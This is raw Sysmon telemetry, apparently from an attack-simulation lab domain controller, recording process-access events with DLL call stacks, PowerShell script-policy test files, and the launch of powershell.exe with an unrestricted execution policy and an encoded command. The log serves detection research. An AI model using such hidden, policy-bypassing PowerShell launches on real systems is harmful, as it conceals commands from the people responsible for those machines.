System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.653{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yo4zyc50.rmy.ps12021-01-18 13:33:21.653 10341000x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.638{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.606{59A5CD1D-8E21-6005-D702-00000000A201}46524256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+955532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+94a12e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67
958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949dac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949da232(wow64) 154100x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.617{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.560{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.560{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.528{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wtlgnfkh.2z5.ps12021-01-18 13:33:21.528 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.513{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.497{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.497{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.497{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 